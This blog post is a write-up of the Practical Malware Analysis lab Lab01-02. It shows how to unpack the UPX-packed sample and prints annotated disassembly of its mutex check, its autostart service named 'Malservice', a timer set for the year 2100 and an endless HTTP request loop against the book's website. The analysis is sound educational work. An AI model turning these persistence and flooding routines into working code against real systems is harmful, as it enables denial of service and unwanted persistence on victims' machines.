Post

0x03_Lab01-02

Posted
By silma 3 min read

Overview

FilenameSizeMD5
Lab01-02.exe03 KB8363436878404da0ae3e46991e355b83

TL;DR: This is a small upxed binary that acts as a service process. It unpacks itself, creates a mutex named HGL345, creates an autostart service named Malservice, and schedules a DOS attack all by itself against http://www.malwareanalysisbook.com for year 2100.

Tools: UPX, IDA Free 7.0, x32dbg

IDB: Lab01-02_decompressed.i64

Unpacking

The purpose of UPX is to reduce the size of a binary, not to protect it. Thus, unpacking is straightforward:

1

upx -d -o Lab01-02_decompressed.exe Lab01-02.exe

Service creation

The main() function starts by calling the API StartServiceCtrlDispatcherA, which connects the main thread to the Service Control Manager (SCM):

1
2
3
4
5
6
7
8
9
10

0x00401003    lea     eax, [esp+10h+ServiceStartTable]
0x00401007    mov     [esp+10h+ServiceStartTable.lpServiceName], offset aMalservice ; "MalService"
0x0040100F    push    eax             ; lpServiceStartTable
0x00401010    mov     [esp+14h+ServiceStartTable.lpServiceProc], offset ServiceMain
0x00401018    mov     [esp+14h+var_8], 0
0x00401020    mov     [esp+14h+var_4], 0
0x00401028    call    ds:StartServiceCtrlDispatcherA
0x0040102E    push    0
0x00401030    push    0
0x00401032    call    ServiceMain

Immediately after, the ServiceMain() is called. The ServiceMain() starts by checking the existence of a mutex named “HGL345”:

1
2
3
4
5

0x00401046    push    offset Name     ; "HGL345"
0x0040104B    push    0               ; bInheritHandle
0x0040104D    push    1F0001h         ; dwDesiredAccess
0x00401052    call    ds:OpenMutexA
0x00401058    test    eax, eax

The process exits if the mutex already exists, else it creates it (code not shown). Then comes the creation of the service. First, a handle to the SCM is requested:

1
2
3
4
5

0x00401074    push    3     ; SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE
0x00401076    push    0     ; lpDatabaseName
0x00401078    push    0     ; lpMachineName
0x0040107A    call    ds:OpenSCManagerA
0x00401080    mov     esi, eax

Next, the full path of the malware is retrieved:

1
2
3
4
5

0x00401082    lea     eax, [esp+404h+Filename]
0x00401086    push    3E8h            ; nSize
0x0040108B    push    eax             ; lpFilename
0x0040108C    push    0               ; hModule: 0=self
0x0040108E    call    ds:GetModuleFileNameA

Finally, the service named “Malservice” is created. It will be started automatically by the SCM during system startup (SERVICE_AUTO_START) and will run in its own address space (SERVICE_WIN32_OWN_PROCESS):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

0x00401094    push    0               ; lpPassword
0x00401096    push    0               ; lpServiceStartName
0x00401098    push    0               ; lpDependencies
0x0040109A    push    0               ; lpdwTagId
0x0040109C    lea     ecx, [esp+414h+Filename] ; malware full path
0x004010A0    push    0               ; lpLoadOrderGroup
0x004010A2    push    ecx             ; lpBinaryPathName
0x004010A3    push    SERVICE_ERROR_IGNORE ; dwErrorControl
0x004010A5    push    SERVICE_AUTO_START ; dwStartType
0x004010A7    push    SERVICE_WIN32_OWN_PROCESS ; dwServiceType
0x004010A9    push    SC_MANAGER_CREATE_SERVICE ; dwDesiredAccess
0x004010AB    push    offset DisplayName ; "Malservice"
0x004010B0    push    offset DisplayName ; "Malservice"
0x004010B5    push    esi             ; hSCManager
0x004010B6    call    ds:CreateServiceA

Once the service is created, a timer is set for the year 2100:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

[...]
0x004010CE    push    eax             ; lpFileTime
[...]
0x004010D3    push    ecx             ; lpSystemTime
[...]
0x004010D8    mov     [esp+40Ch+SystemTime.wYear], 2100
0x004010DF    call    ds:SystemTimeToFileTime
0x004010E5    push    0               ; lpTimerName
0x004010E7    push    0               ; bManualReset
0x004010E9    push    0               ; lpTimerAttributes
0x004010EB    call    ds:CreateWaitableTimerA
0x004010F1    push    0               ; fResume
0x004010F3    push    0               ; lpArgToCompletionRoutine
0x004010F5    push    0               ; pfnCompletionRoutine
0x004010F7    lea     edx, [esp+410h+FileTime]
0x004010FB    mov     esi, eax        ; hTimer
0x004010FD    push    0               ; lPeriod: signaled once
0x004010FF    push    edx             ; lpDueTime: time after which the timer is signaled
0x00401100    push    esi             ; hTimer
0x00401101    call    ds:SetWaitableTimer

The thread waits indefinitely until the timer is signaled:

1
2
3

0x00401107    push    0FFFFFFFFh      ; dwMilliseconds
0x00401109    push    esi             ; hTimer
0x0040110A    call    ds:WaitForSingleObject

If the timer is signaled, a thread sending HTTP requests is created.

Network

The thread starts by initializing the use of the WinINet functions:

1
2
3
4
5
6

0x00401152    push    0               ; dwFlags
0x00401154    push    0               ; lpszProxyBypass
0x00401156    push    0               ; lpszProxy
0x00401158    push    INTERNET_OPEN_TYPE_DIRECT ; dwAccessType
0x0040115A    push    offset szAgent  ; "Internet Explorer 8.0"
0x0040115F    call    ds:InternetOpenA

Then, it enters into an infinite loop that opens the URL http://www.malwareanalysisbook.com:

1
2
3
4
5
6
7
8
9

0x0040116D loop:
0x0040116D    push    0               ; dwContext
0x0040116F    push    INTERNET_FLAG_RELOAD ; dwFlags
0x00401174    push    0               ; dwHeadersLength
0x00401176    push    0               ; lpszHeaders
0x00401178    push    offset szUrl    ; "http://www.malwareanalysisbook.com"
0x0040117D    push    esi             ; hInternet
0x0040117E    call    edi ; InternetOpenUrlA
0x00401180    jmp     short loop

EOF

series, Practical Malware Analysis
malware analysis reverse engineering upx malicious service wininet
This post is licensed under CC BY 4.0 by the author.